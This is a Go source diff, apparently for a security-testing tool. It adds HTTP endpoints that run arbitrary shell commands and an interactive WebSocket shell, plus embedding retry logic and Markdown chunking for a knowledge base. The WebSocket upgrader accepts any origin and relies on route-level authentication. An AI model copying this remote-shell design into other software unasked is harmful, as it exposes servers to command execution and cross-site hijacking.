c.JSON(http.StatusOK, resp)
}
// streamEvent SSE 事件
type streamEvent struct {
T string `json:"t"` // "out" | "err" | "exit"
D string `json:"d,omitempty"`
C int `json:"c"` // exit code(不用 omitempty,否则 0 不序列化导致前端显示 [exit undefined]
}
// RunCommandStream 流式执行命令,输出实时推送到前端(SSE)
func (h *TerminalHandler) RunCommandStream(c *gin.Context) {
var req RunCommandRequest
if err := c.ShouldBindJSON(&req); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "请求体无效,需要 command 字段"})
return
}
cmdStr := strings.TrimSpace(req.Command)
if cmdStr == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "command 不能为空"})
return
}
if len(cmdStr) > terminalMaxCommandLen {
c.JSON(http.StatusBadRequest, gin.H{"error": "命令过长"})
return
}
shell := req.Shell
if shell == "" {
if runtime.GOOS == "windows" {
shell = "cmd"
} else {
shell = "sh"
}
}
ctx, cancel := context.WithTimeout(c.Request.Context(), terminalTimeout)
defer cancel()
var cmd *exec.Cmd
if runtime.GOOS == "windows" {
cmd = exec.CommandContext(ctx, "cmd", "/c", cmdStr)
} else {
cmd = exec.CommandContext(ctx, shell, "-c", cmdStr)
cmd.Env = append(os.Environ(), "COLUMNS=256", "LINES=40", "TERM=xterm-256color")
}
if req.Cwd != "" {
absCwd, err := filepath.Abs(req.Cwd)
if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录无效"})
return
}
cur, _ := os.Getwd()
curAbs, _ := filepath.Abs(cur)
rel, err := filepath.Rel(curAbs, absCwd)
if err != nil || strings.HasPrefix(rel, "..") || rel == ".." {
c.JSON(http.StatusBadRequest, gin.H{"error": "工作目录必须在当前进程目录下"})
return
}
cmd.Dir = absCwd
}
c.Header("Content-Type", "text/event-stream")
c.Header("Cache-Control", "no-cache")
c.Header("Connection", "keep-alive")
c.Header("X-Accel-Buffering", "no")
c.Writer.WriteHeader(http.StatusOK)
flusher, ok := c.Writer.(http.Flusher)
if !ok {
cancel()
return
}
sendEvent := func(ev streamEvent) {
body, _ := json.Marshal(ev)
c.SSEvent("", string(body))
flusher.Flush()
}
runCommandStreamImpl(cmd, sendEvent, ctx)
}
+46
View File
@@ -0,0 +1,46 @@
//go:build !windows
package handler
import (
"bufio"
"context"
"os/exec"
"strings"
"github.com/creack/pty"
)
const ptyCols = 256
const ptyRows = 40
// runCommandStreamImpl 在 Unix 下用 PTY 执行,使 ping 等命令按终端宽度排版(isatty 为真)
func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) {
ptmx, err := pty.StartWithSize(cmd, &pty.Winsize{Cols: ptyCols, Rows: ptyRows})
if err != nil {
sendEvent(streamEvent{T: "exit", C: -1})
return
}
defer ptmx.Close()
normalize := func(s string) string {
s = strings.ReplaceAll(s, "\r\n", "\n")
return strings.ReplaceAll(s, "\r", "\n")
}
sc := bufio.NewScanner(ptmx)
for sc.Scan() {
sendEvent(streamEvent{T: "out", D: normalize(sc.Text())})
}
exitCode := 0
if err := cmd.Wait(); err != nil {
if exitErr, ok := err.(*exec.ExitError); ok {
exitCode = exitErr.ExitCode()
} else {
exitCode = -1
}
}
if ctx.Err() == context.DeadlineExceeded {
exitCode = -1
}
sendEvent(streamEvent{T: "exit", C: exitCode})
}
@@ -0,0 +1,65 @@
//go:build windows
package handler
import (
"bufio"
"context"
"os/exec"
"strings"
"sync"
)
// runCommandStreamImpl 在 Windows 下用 stdout/stderr 管道执行
func runCommandStreamImpl(cmd *exec.Cmd, sendEvent func(streamEvent), ctx context.Context) {
stdoutPipe, err := cmd.StdoutPipe()
if err != nil {
sendEvent(streamEvent{T: "exit", C: -1})
return
}
stderrPipe, err := cmd.StderrPipe()
if err != nil {
sendEvent(streamEvent{T: "exit", C: -1})
return
}
if err := cmd.Start(); err != nil {
sendEvent(streamEvent{T: "exit", C: -1})
return
}
normalize := func(s string) string {
s = strings.ReplaceAll(s, "\r\n", "\n")
return strings.ReplaceAll(s, "\r", "\n")
}
var wg sync.WaitGroup
wg.Add(2)
go func() {
defer wg.Done()
sc := bufio.NewScanner(stdoutPipe)
for sc.Scan() {
sendEvent(streamEvent{T: "out", D: normalize(sc.Text())})
}
}()
go func() {
defer wg.Done()
sc := bufio.NewScanner(stderrPipe)
for sc.Scan() {
sendEvent(streamEvent{T: "err", D: normalize(sc.Text())})
}
}()
wg.Wait()
exitCode := 0
if err := cmd.Wait(); err != nil {
if exitErr, ok := err.(*exec.ExitError); ok {
exitCode = exitErr.ExitCode()
} else {
exitCode = -1
}
}
if ctx.Err() == context.DeadlineExceeded {
exitCode = -1
}
sendEvent(streamEvent{T: "exit", C: exitCode})
}
+95
View File
@@ -0,0 +1,95 @@
//go:build !windows
package handler
import (
"net/http"
"os"
"os/exec"
"time"
"github.com/creack/pty"
"github.com/gin-gonic/gin"
"github.com/gorilla/websocket"
)
// wsUpgrader 仅用于系统设置中的终端 WebSocket,会复用已有的登录保护(JWT 中间件在上层路由组)
var wsUpgrader = websocket.Upgrader{
CheckOrigin: func(r *http.Request) bool {
// 由于已在 Gin 路由层做了认证,这里放宽 Origin,方便在同一域名下通过 HTTPS/WSS 访问
return true
},
}
// RunCommandWS 提供真正交互式 Shell:基于 WebSocket + PTY 的长会话
// 前端建立 WebSocket 连接后,所有键盘输入都会透传到 Shell,Shell 的输出也会实时写回前端。
func (h *TerminalHandler) RunCommandWS(c *gin.Context) {
conn, err := wsUpgrader.Upgrade(c.Writer, c.Request, nil)
if err != nil {
return
}
defer conn.Close()
// 启动交互式 Shell,这里优先使用 bash,找不到则退回 sh
shell := "bash"
if _, err := exec.LookPath(shell); err != nil {
shell = "sh"
}
cmd := exec.Command(shell)
cmd.Env = append(os.Environ(),
"COLUMNS=256",
"LINES=40",
"TERM=xterm-256color",
)
ptmx, err := pty.StartWithSize(cmd, &pty.Winsize{Cols: ptyCols, Rows: ptyRows})
if err != nil {
return
}
defer ptmx.Close()
// Shell -> WebSocket:将 PTY 输出实时发给前端
doneChan := make(chan struct{})
go func() {
buf := make([]byte, 4096)
for {
n, err := ptmx.Read(buf)
if n > 0 {
_ = conn.WriteMessage(websocket.BinaryMessage, buf[:n])
}
if err != nil {
break
}
}
close(doneChan)
}()
// WebSocket -> Shell:将前端输入写入 PTY(包括 sudo 密码、Ctrl+C 等)
conn.SetReadLimit(64 * 1024)
_ = conn.SetReadDeadline(time.Now().Add(terminalTimeout))
conn.SetPongHandler(func(string) error {
_ = conn.SetReadDeadline(time.Now().Add(terminalTimeout))
return nil
})
for {
msgType, data, err := conn.ReadMessage()
if err != nil {
_ = cmd.Process.Kill()
break
}
if msgType != websocket.TextMessage && msgType != websocket.BinaryMessage {
continue
}
if len(data) == 0 {
continue
}
if _, err := ptmx.Write(data); err != nil {
_ = cmd.Process.Kill()
break
}
}
<-doneChan
}
+149 -31
View File
@@ -6,39 +6,75 @@ import (
"fmt"
"net/http"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/openai"
"go.uber.org/zap"
"golang.org/x/time/rate"
)
// Embedder 文本嵌入器
type Embedder struct {
openAIClient *openai.Client
config *config.KnowledgeConfig
openAIConfig *config.OpenAIConfig // 用于获取API Key
logger *zap.Logger
openAIClient *openai.Client
config *config.KnowledgeConfig
openAIConfig *config.OpenAIConfig // 用于获取 API Key
logger *zap.Logger
rateLimiter *rate.Limiter // 速率限制器
rateLimitDelay time.Duration // 请求间隔时间
maxRetries int // 最大重试次数
retryDelay time.Duration // 重试间隔
mu sync.Mutex // 保护 rateLimiter
}
// NewEmbedder 创建新的嵌入器
func NewEmbedder(cfg *config.KnowledgeConfig, openAIConfig *config.OpenAIConfig, openAIClient *openai.Client, logger *zap.Logger) *Embedder {
// 初始化速率限制器
var rateLimiter *rate.Limiter
var rateLimitDelay time.Duration
// 如果配置了 MaxRPM,根据 RPM 计算速率限制
if cfg.Indexing.MaxRPM > 0 {
rpm := cfg.Indexing.MaxRPM
rateLimiter = rate.NewLimiter(rate.Every(time.Minute/time.Duration(rpm)), rpm)
logger.Info("知识库索引速率限制已启用", zap.Int("maxRPM", rpm))
} else if cfg.Indexing.RateLimitDelayMs > 0 {
// 如果没有配置 MaxRPM 但配置了固定延迟,使用固定延迟模式
rateLimitDelay = time.Duration(cfg.Indexing.RateLimitDelayMs) * time.Millisecond
logger.Info("知识库索引固定延迟已启用", zap.Duration("delay", rateLimitDelay))
}
// 重试配置
maxRetries := 3
retryDelay := 1000 * time.Millisecond
if cfg.Indexing.MaxRetries > 0 {
maxRetries = cfg.Indexing.MaxRetries
}
if cfg.Indexing.RetryDelayMs > 0 {
retryDelay = time.Duration(cfg.Indexing.RetryDelayMs) * time.Millisecond
}
return &Embedder{
openAIClient: openAIClient,
config: cfg,
openAIConfig: openAIConfig,
logger: logger,
openAIClient: openAIClient,
config: cfg,
openAIConfig: openAIConfig,
logger: logger,
rateLimiter: rateLimiter,
rateLimitDelay: rateLimitDelay,
maxRetries: maxRetries,
retryDelay: retryDelay,
}
}
// EmbeddingRequest OpenAI嵌入请求
// EmbeddingRequest OpenAI 嵌入请求
type EmbeddingRequest struct {
Model string `json:"model"`
Input []string `json:"input"`
}
// EmbeddingResponse OpenAI嵌入响应
// EmbeddingResponse OpenAI 嵌入响应
type EmbeddingResponse struct {
Data []EmbeddingData `json:"data"`
Error *EmbeddingError `json:"error,omitempty"`
@@ -56,12 +92,69 @@ type EmbeddingError struct {
Type string `json:"type"`
}
// EmbedText 对文本进行嵌入
func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error) {
if e.openAIClient == nil {
return nil, fmt.Errorf("OpenAI客户端未初始化")
// waitRateLimiter 等待速率限制器
func (e *Embedder) waitRateLimiter() {
e.mu.Lock()
defer e.mu.Unlock()
if e.rateLimiter != nil {
// 等待令牌
ctx := context.Background()
if err := e.rateLimiter.Wait(ctx); err != nil {
e.logger.Warn("速率限制器等待失败", zap.Error(err))
}
}
if e.rateLimitDelay > 0 {
time.Sleep(e.rateLimitDelay)
}
}
// EmbedText 对文本进行嵌入(带重试和速率限制)
func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error) {
if e.openAIClient == nil {
return nil, fmt.Errorf("OpenAI 客户端未初始化")
}
var lastErr error
for attempt := 0; attempt < e.maxRetries; attempt++ {
// 速率限制
if attempt > 0 {
// 重试时等待更长时间
waitTime := e.retryDelay * time.Duration(attempt)
e.logger.Debug("重试前等待", zap.Int("attempt", attempt+1), zap.Duration("waitTime", waitTime))
select {
case <-ctx.Done():
return nil, ctx.Err()
case <-time.After(waitTime):
}
} else {
e.waitRateLimiter()
}
result, err := e.doEmbedText(ctx, text)
if err == nil {
return result, nil
}
lastErr = err
// 检查是否是可重试的错误(429 速率限制、5xx 服务器错误、网络错误)
if !e.isRetryableError(err) {
return nil, err
}
e.logger.Debug("嵌入请求失败,准备重试",
zap.Int("attempt", attempt+1),
zap.Int("maxRetries", e.maxRetries),
zap.Error(err))
}
return nil, fmt.Errorf("达到最大重试次数 (%d): %v", e.maxRetries, lastErr)
}
// doEmbedText 执行实际的嵌入请求(内部方法)
func (e *Embedder) doEmbedText(ctx context.Context, text string) ([]float32, error) {
// 使用配置的嵌入模型
model := e.config.Embedding.Model
if model == "" {
@@ -73,7 +166,7 @@ func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error
Input: []string{text},
}
// 清理baseURL:去除前后空格和尾部斜杠
// 清理 baseURL:去除前后空格和尾部斜杠
baseURL := strings.TrimSpace(e.config.Embedding.BaseURL)
baseURL = strings.TrimSuffix(baseURL, "/")
if baseURL == "" {
@@ -83,24 +176,24 @@ func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error
// 构建请求
body, err := json.Marshal(req)
if err != nil {
return nil, fmt.Errorf("序列化请求失败: %w", err)
return nil, fmt.Errorf("序列化请求失败%w", err)
}
requestURL := baseURL + "/embeddings"
httpReq, err := http.NewRequestWithContext(ctx, http.MethodPost, requestURL, strings.NewReader(string(body)))
if err != nil {
return nil, fmt.Errorf("创建请求失败: %w", err)
return nil, fmt.Errorf("创建请求失败%w", err)
}
httpReq.Header.Set("Content-Type", "application/json")
// 使用配置的API Key,如果没有则使用OpenAI配置的
// 使用配置的 API Key,如果没有则使用 OpenAI 配置的
apiKey := strings.TrimSpace(e.config.Embedding.APIKey)
if apiKey == "" && e.openAIConfig != nil {
apiKey = e.openAIConfig.APIKey
}
if apiKey == "" {
return nil, fmt.Errorf("API Key未配置")
return nil, fmt.Errorf("API Key 未配置")
}
httpReq.Header.Set("Authorization", "Bearer "+apiKey)
@@ -110,7 +203,7 @@ func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error
}
resp, err := httpClient.Do(httpReq)
if err != nil {
return nil, fmt.Errorf("发送请求失败: %w", err)
return nil, fmt.Errorf("发送请求失败%w", err)
}
defer resp.Body.Close()
@@ -132,7 +225,7 @@ func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error
if len(requestBodyPreview) > 200 {
requestBodyPreview = requestBodyPreview[:200] + "..."
}
e.logger.Debug("嵌入API请求",
e.logger.Debug("嵌入 API 请求",
zap.String("url", httpReq.URL.String()),
zap.String("model", model),
zap.String("requestBody", requestBodyPreview),
@@ -148,12 +241,12 @@ func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error
if len(bodyPreview) > 500 {
bodyPreview = bodyPreview[:500] + "..."
}
return nil, fmt.Errorf("解析响应失败 (URL: %s, 状态码: %d, 响应长度: %d字节): %w\n请求体: %s\n响应内容预览: %s",
return nil, fmt.Errorf("解析响应失败 (URL: %s, 状态码%d, 响应长度%d字节): %w\n请求体%s\n响应内容预览%s",
requestURL, resp.StatusCode, len(bodyBytes), err, requestBodyPreview, bodyPreview)
}
if embeddingResp.Error != nil {
return nil, fmt.Errorf("OpenAI API错误 (状态码: %d): 类型=%s, 消息=%s",
return nil, fmt.Errorf("OpenAI API 错误 (状态码%d): 类型=%s, 消息=%s",
resp.StatusCode, embeddingResp.Error.Type, embeddingResp.Error.Message)
}
@@ -162,7 +255,7 @@ func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error
if len(bodyPreview) > 500 {
bodyPreview = bodyPreview[:500] + "..."
}
return nil, fmt.Errorf("HTTP请求失败 (URL: %s, 状态码: %d): 响应内容=%s", requestURL, resp.StatusCode, bodyPreview)
return nil, fmt.Errorf("HTTP 请求失败 (URL: %s, 状态码%d): 响应内容=%s", requestURL, resp.StatusCode, bodyPreview)
}
if len(embeddingResp.Data) == 0 {
@@ -170,11 +263,11 @@ func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error
if len(bodyPreview) > 500 {
bodyPreview = bodyPreview[:500] + "..."
}
return nil, fmt.Errorf("未收到嵌入数据 (状态码: %d, 响应长度: %d字节)\n响应内容: %s",
return nil, fmt.Errorf("未收到嵌入数据 (状态码%d, 响应长度%d字节)\n响应内容%s",
resp.StatusCode, len(bodyBytes), bodyPreview)
}
// 转换为float32
// 转换为 float32
embedding := make([]float32, len(embeddingResp.Data[0].Embedding))
for i, v := range embeddingResp.Data[0].Embedding {
embedding[i] = float32(v)
@@ -183,23 +276,48 @@ func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error
return embedding, nil
}
// isRetryableError 判断是否是可重试的错误
func (e *Embedder) isRetryableError(err error) bool {
if err == nil {
return false
}
errStr := err.Error()
// 429 速率限制错误
if strings.Contains(errStr, "429") || strings.Contains(errStr, "rate limit") {
return true
}
// 5xx 服务器错误
if strings.Contains(errStr, "500") || strings.Contains(errStr, "502") ||
strings.Contains(errStr, "503") || strings.Contains(errStr, "504") {
return true
}
// 网络错误
if strings.Contains(errStr, "timeout") || strings.Contains(errStr, "connection") ||
strings.Contains(errStr, "network") || strings.Contains(errStr, "EOF") {
return true
}
return false
}
// EmbedTexts 批量嵌入文本
func (e *Embedder) EmbedTexts(ctx context.Context, texts []string) ([][]float32, error) {
if len(texts) == 0 {
return nil, nil
}
// OpenAI API支持批量,但为了简单起见,我们逐个处理
// 实际可以使用批量API以提高效率
embeddings := make([][]float32, len(texts))
for i, text := range texts {
embedding, err := e.EmbedText(ctx, text)
if err != nil {
return nil, fmt.Errorf("嵌入文本[%d]失败: %w", i, err)
return nil, fmt.Errorf("嵌入文本 [%d] 失败%w", i, err)
}
embeddings[i] = embedding
}
return embeddings, nil
}
+382 -98
View File
@@ -10,56 +10,133 @@ import (
"sync"
"time"
"cyberstrike-ai/internal/config"
"github.com/google/uuid"
"go.uber.org/zap"
)
// Indexer 索引器,负责将知识项分块并向量化
type Indexer struct {
db *sql.DB
embedder *Embedder
logger *zap.Logger
chunkSize int // 每个块的最大token数(估算)
overlap int // 块之间的重叠token数
db *sql.DB
embedder *Embedder
logger *zap.Logger
chunkSize int // 每个块的最大 token 数(估算)
overlap int // 块之间的重叠 token
maxChunks int // 单个知识项的最大块数量(0 表示不限制)
// 错误跟踪
mu sync.RWMutex
lastError string // 最近一次错误信息
mu sync.RWMutex
lastError string // 最近一次错误信息
lastErrorTime time.Time // 最近一次错误时间
errorCount int // 连续错误计数
errorCount int // 连续错误计数
// 重建索引状态跟踪
rebuildMu sync.RWMutex
isRebuilding bool // 是否正在重建索引
rebuildTotalItems int // 重建总项数
rebuildCurrent int // 当前已处理项数
rebuildFailed int // 重建失败项数
rebuildStartTime time.Time // 重建开始时间
rebuildLastItemID string // 最近处理的项 ID
rebuildLastChunks int // 最近处理的项的分块数
}
// NewIndexer 创建新的索引器
func NewIndexer(db *sql.DB, embedder *Embedder, logger *zap.Logger) *Indexer {
func NewIndexer(db *sql.DB, embedder *Embedder, logger *zap.Logger, indexingCfg *config.IndexingConfig) *Indexer {
chunkSize := 512
overlap := 50
maxChunks := 0
if indexingCfg != nil {
if indexingCfg.ChunkSize > 0 {
chunkSize = indexingCfg.ChunkSize
}
if indexingCfg.ChunkOverlap >= 0 {
overlap = indexingCfg.ChunkOverlap
}
if indexingCfg.MaxChunksPerItem > 0 {
maxChunks = indexingCfg.MaxChunksPerItem
}
}
return &Indexer{
db: db,
embedder: embedder,
logger: logger,
chunkSize: 512, // 默认512 tokens
overlap: 50, // 默认50 tokens重叠
chunkSize: chunkSize,
overlap: overlap,
maxChunks: maxChunks,
}
}
// ChunkText 将文本分块(支持重叠)
// ChunkText 将文本分块(支持重叠,保留标题上下文
func (idx *Indexer) ChunkText(text string) []string {
// 按Markdown标题分割
chunks := idx.splitByMarkdownHeaders(text)
// 按 Markdown 标题分割,获取带标题的块
sections := idx.splitByMarkdownHeadersWithContent(text)
// 如果块太大,进一步分割
// 处理每个块
result := make([]string, 0)
for _, chunk := range chunks {
if idx.estimateTokens(chunk) <= idx.chunkSize {
result = append(result, chunk)
for _, section := range sections {
// 构建父级标题路径(不包含最后一级标题,因为内容中已经包含)
// 例如:["# A", "## B", "### C"] -> "[# A > ## B]"
var parentHeaderPath string
if len(section.HeaderPath) > 1 {
parentHeaderPath = strings.Join(section.HeaderPath[:len(section.HeaderPath)-1], " > ")
}
// 提取内容的第一行作为标题(如 "# Prompt Injection"
firstLine, remainingContent := extractFirstLine(section.Content)
// 如果剩余内容为空或只有空白,说明这个块只有标题没有正文,跳过
if strings.TrimSpace(remainingContent) == "" {
continue
}
// 如果块太大,进一步分割
if idx.estimateTokens(section.Content) <= idx.chunkSize {
// 块大小合适,添加父级标题前缀
if parentHeaderPath != "" {
result = append(result, fmt.Sprintf("[%s] %s", parentHeaderPath, section.Content))
} else {
result = append(result, section.Content)
}
} else {
// 按段落分割
subChunks := idx.splitByParagraphs(chunk)
for _, subChunk := range subChunks {
if idx.estimateTokens(subChunk) <= idx.chunkSize {
result = append(result, subChunk)
} else {
// 按句子分割(支持重叠)
chunksWithOverlap := idx.splitBySentencesWithOverlap(subChunk)
result = append(result, chunksWithOverlap...)
// 块太大,按子标题或段落分割,保持标题上下文
// 首先尝试按子标题分割(保留子标题结构)
subSections := idx.splitBySubHeaders(section.Content, firstLine, parentHeaderPath)
if len(subSections) > 1 {
// 成功按子标题分割,递归处理每个子块
for _, sub := range subSections {
if idx.estimateTokens(sub) <= idx.chunkSize {
result = append(result, sub)
} else {
// 子块仍然太大,按段落分割(保留标题前缀)
paragraphs := idx.splitByParagraphsWithHeader(sub, parentHeaderPath)
for _, para := range paragraphs {
if idx.estimateTokens(para) <= idx.chunkSize {
result = append(result, para)
} else {
// 段落仍太大,按句子分割
sentenceChunks := idx.splitBySentencesWithOverlap(para)
for _, chunk := range sentenceChunks {
result = append(result, chunk)
}
}
}
}
}
} else {
// 没有子标题,按段落分割(保留标题前缀)
paragraphs := idx.splitByParagraphsWithHeader(section.Content, parentHeaderPath)
for _, para := range paragraphs {
if idx.estimateTokens(para) <= idx.chunkSize {
result = append(result, para)
} else {
// 段落仍太大,按句子分割
sentenceChunks := idx.splitBySentencesWithOverlap(para)
for _, chunk := range sentenceChunks {
result = append(result, chunk)
}
}
}
}
}
@@ -68,43 +145,183 @@ func (idx *Indexer) ChunkText(text string) []string {
return result
}
// splitByMarkdownHeaders 按Markdown标题分割
func (idx *Indexer) splitByMarkdownHeaders(text string) []string {
// 匹配Markdown标题 (# ## ### 等)
// extractFirstLine 提取第一行内容和剩余内容
func extractFirstLine(content string) (firstLine, remaining string) {
lines := strings.SplitN(content, "\n", 2)
if len(lines) == 0 {
return "", ""
}
if len(lines) == 1 {
return lines[0], ""
}
return lines[0], lines[1]
}
// splitBySubHeaders 尝试按子标题分割内容(用于处理大块内容)
// headerPrefix 是父级标题路径,用于添加到每个子块
func (idx *Indexer) splitBySubHeaders(content, headerPrefix, parentPath string) []string {
// 匹配 Markdown 子标题(## 及以上)
subHeaderRegex := regexp.MustCompile(`(?m)^#{2,6}\s+.+$`)
matches := subHeaderRegex.FindAllStringIndex(content, -1)
if len(matches) == 0 {
// 没有子标题,返回原始内容
return []string{content}
}
result := make([]string, 0, len(matches))
for i, match := range matches {
start := match[0]
nextStart := len(content)
if i+1 < len(matches) {
nextStart = matches[i+1][0]
}
subContent := strings.TrimSpace(content[start:nextStart])
// 添加父级路径前缀
if parentPath != "" {
result = append(result, fmt.Sprintf("[%s] %s", parentPath, subContent))
} else {
result = append(result, subContent)
}
}
return result
}
// splitByParagraphsWithHeader 按段落分割,每个段落添加标题前缀(用于保持上下文)
func (idx *Indexer) splitByParagraphsWithHeader(content, parentPath string) []string {
// 提取第一行作为标题
firstLine, _ := extractFirstLine(content)
paragraphs := strings.Split(content, "\n\n")
result := make([]string, 0)
for i, p := range paragraphs {
trimmed := strings.TrimSpace(p)
if trimmed == "" {
continue
}
// 过滤掉只有标题的段落(没有实际内容)
if strings.TrimSpace(trimmed) == strings.TrimSpace(firstLine) {
continue
}
// 第一个段落已经包含标题,不需要重复添加
if i == 0 && strings.Contains(trimmed, firstLine) {
if parentPath != "" {
result = append(result, fmt.Sprintf("[%s] %s", parentPath, trimmed))
} else {
result = append(result, trimmed)
}
} else {
// 其他段落添加标题前缀以保持上下文
if parentPath != "" {
result = append(result, fmt.Sprintf("[%s] %s\n%s", parentPath, firstLine, trimmed))
} else {
result = append(result, fmt.Sprintf("%s\n%s", firstLine, trimmed))
}
}
}
return result
}
// Section 表示一个带标题路径的文本块
type Section struct {
HeaderPath []string // 标题路径(如 ["# SQL 注入", "## 检测方法"]
Content string // 块内容
}
// splitByMarkdownHeadersWithContent 按 Markdown 标题分割,返回带标题路径的块
// 每个块的内容包含自己的标题,用于向量化检索
//
// 例如,对于以下 Markdown:
// # Prompt Injection
// 引言内容
// ## Summary
// 目录内容
//
// 返回:
// [{HeaderPath: ["# Prompt Injection"], Content: "# Prompt Injection\n引言内容"},
// {HeaderPath: ["# Prompt Injection", "## Summary"], Content: "## Summary\n目录内容"}]
func (idx *Indexer) splitByMarkdownHeadersWithContent(text string) []Section {
// 匹配 Markdown 标题 (# ## ### 等)
headerRegex := regexp.MustCompile(`(?m)^#{1,6}\s+.+$`)
// 找到所有标题位置
matches := headerRegex.FindAllStringIndex(text, -1)
if len(matches) == 0 {
return []string{text}
// 没有标题,返回整个文本
return []Section{{HeaderPath: []string{}, Content: text}}
}
chunks := make([]string, 0)
lastPos := 0
sections := make([]Section, 0, len(matches))
currentHeaderPath := []string{}
for _, match := range matches {
for i, match := range matches {
start := match[0]
if start > lastPos {
chunks = append(chunks, strings.TrimSpace(text[lastPos:start]))
}
lastPos = start
}
end := match[1]
nextStart := len(text)
// 添加最后一部分
if lastPos < len(text) {
chunks = append(chunks, strings.TrimSpace(text[lastPos:]))
// 找到下一个标题的位置
if i+1 < len(matches) {
nextStart = matches[i+1][0]
}
// 提取当前标题
headerLine := strings.TrimSpace(text[start:end])
// 计算标题层级(# 的数量)
level := 0
for _, ch := range headerLine {
if ch == '#' {
level++
} else {
break
}
}
// 更新标题路径:移除比当前层级深或等于的子标题,然后添加当前标题
newPath := make([]string, 0, len(currentHeaderPath)+1)
for _, h := range currentHeaderPath {
hLevel := 0
for _, ch := range h {
if ch == '#' {
hLevel++
} else {
break
}
}
if hLevel < level {
newPath = append(newPath, h)
}
}
newPath = append(newPath, headerLine)
currentHeaderPath = newPath
// 提取当前标题到下一个标题之间的内容(包含当前标题)
content := strings.TrimSpace(text[start:nextStart])
// 创建块,使用当前标题路径(包含当前标题)
sections = append(sections, Section{
HeaderPath: append([]string(nil), currentHeaderPath...),
Content: content,
})
}
// 过滤空块
result := make([]string, 0)
for _, chunk := range chunks {
if strings.TrimSpace(chunk) != "" {
result = append(result, chunk)
result := make([]Section, 0, len(sections))
for _, section := range sections {
if strings.TrimSpace(section.Content) != "" {
result = append(result, section)
}
}
if len(result) == 0 {
return []string{text}
return []Section{{HeaderPath: []string{}, Content: text}}
}
return result
@@ -124,8 +341,12 @@ func (idx *Indexer) splitByParagraphs(text string) []string {
// splitBySentences 按句子分割(用于内部,不包含重叠逻辑)
func (idx *Indexer) splitBySentences(text string) []string {
// 简单的句子分割(按句号、问号、感叹号)
sentenceRegex := regexp.MustCompile(`[.!?]+\s+`)
// 简单的句子分割(按句号、问号、感叹号,支持中英文
// . ! ? = 英文标点
// \u3002 = 。(中文句号)
// \uFF01 = (中文叹号)
// \uFF1F = (中文问号)
sentenceRegex := regexp.MustCompile(`[.!?\x{3002}\x{FF01}\x{FF1F}]+`)
sentences := sentenceRegex.Split(text, -1)
result := make([]string, 0)
for _, s := range sentences {
@@ -221,13 +442,13 @@ func (idx *Indexer) splitBySentencesSimple(text string) []string {
return result
}
// extractLastTokens 从文本末尾提取指定token数量的内容
// extractLastTokens 从文本末尾提取指定 token 数量的内容
func (idx *Indexer) extractLastTokens(text string, tokenCount int) string {
if tokenCount <= 0 || text == "" {
return ""
}
// 估算字符数(1 token ≈ 4字符)
// 估算字符数(1 token ≈ 4 字符)
charCount := tokenCount * 4
runes := []rune(text)
@@ -236,12 +457,11 @@ func (idx *Indexer) extractLastTokens(text string, tokenCount int) string {
}
// 从末尾提取指定数量的字符
// 尝试在句子边界处截断,避免截断句子中间
startPos := len(runes) - charCount
extracted := string(runes[startPos:])
// 尝试找到第一个句子边界(句号、问号、感叹号后的空格
sentenceBoundary := regexp.MustCompile(`[.!?]+\s+`)
// 尝试找到第一个句子边界(支持中英文标点
sentenceBoundary := regexp.MustCompile(`[.!?\x{3002}\x{FF01}\x{FF1F}]+`)
matches := sentenceBoundary.FindStringIndex(extracted)
if len(matches) > 0 && matches[0] > 0 {
// 在句子边界处截断,保留完整句子
@@ -251,41 +471,51 @@ func (idx *Indexer) extractLastTokens(text string, tokenCount int) string {
return strings.TrimSpace(extracted)
}
// estimateTokens 估算token数(简单估算:1 token ≈ 4字符)
// estimateTokens 估算 token 数(简单估算:1 token ≈ 4 字符)
func (idx *Indexer) estimateTokens(text string) int {
return len([]rune(text)) / 4
}
// IndexItem 索引知识项(分块并向量化)
func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error {
// 获取知识项(包含categorytitle,用于向量化)
// 获取知识项(包含 categorytitle,用于向量化)
var content, category, title string
err := idx.db.QueryRow("SELECT content, category, title FROM knowledge_base_items WHERE id = ?", itemID).Scan(&content, &category, &title)
if err != nil {
return fmt.Errorf("获取知识项失败: %w", err)
return fmt.Errorf("获取知识项失败%w", err)
}
// 删除旧的向量(在 RebuildIndex 中已经统一清空,这里保留是为了单独调用 IndexItem 时的兼容性)
_, err = idx.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", itemID)
if err != nil {
return fmt.Errorf("删除旧向量失败: %w", err)
return fmt.Errorf("删除旧向量失败%w", err)
}
// 分块
chunks := idx.ChunkText(content)
// 应用最大块数限制
if idx.maxChunks > 0 && len(chunks) > idx.maxChunks {
idx.logger.Info("知识项块数量超过限制,已截断",
zap.String("itemId", itemID),
zap.Int("originalChunks", len(chunks)),
zap.Int("maxChunks", idx.maxChunks))
chunks = chunks[:idx.maxChunks]
}
idx.logger.Info("知识项分块完成", zap.String("itemId", itemID), zap.Int("chunks", len(chunks)))
// 跟踪该知识项的错误
itemErrorCount := 0
var firstError error
firstErrorChunkIndex := -1
// 向量化每个块(包含categorytitle信息,以便向量检索时能匹配到风险类型)
// 向量化每个块(包含 categorytitle 信息,以便向量检索时能匹配到风险类型)
for i, chunk := range chunks {
// 将categorytitle信息包含到向量化的文本中
// 格式:"[风险类型: {category}] [标题: {title}]\n{chunk内容}"
// 这样向量嵌入就会包含风险类型信息,即使SQL过滤失败,向量相似度也能帮助匹配
textForEmbedding := fmt.Sprintf("[风险类型: %s] [标题: %s]\n%s", category, title, chunk)
// 将 categorytitle 信息包含到向量化的文本中
// 格式:"[风险类型{category}] [标题{title}]\n{chunk 内容}"
// 这样向量嵌入就会包含风险类型信息,即使 SQL 过滤失败,向量相似度也能帮助匹配
